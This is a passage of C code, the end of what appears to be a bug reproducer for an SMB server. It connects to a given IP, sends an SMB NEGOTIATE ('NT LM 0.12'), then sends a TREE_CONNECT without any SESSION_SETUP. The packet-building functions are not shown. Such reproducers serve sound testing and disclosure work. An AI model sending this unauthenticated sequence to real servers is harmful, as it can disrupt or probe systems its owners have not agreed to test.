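    sin.sin_addr.s_addr = inet_addr(server_ip);
    if (sin.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "bad server_ip: %s\n", server_ip);
        return 1;
    }

    /* Retry until the server accepts the connection, as the original did;
     * a failed socket() is now an error rather than a connect() on -1. */
    for (;;) {
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0) {
            perror("socket");
            return 1;
        }
        if (connect(s, (struct sockaddr *)&sin, sizeof sin) == 0)
            break;
        close(s);
        s = -1;
        sleep(1);
    }

    sleep(1);

    /* The reproducer: NEGOTIATE, then TREE_CONNECT with no SESSION_SETUP. */
    negotiate("NT LM 0.12");
    tree_connect();

    close(s);
    return 0;
}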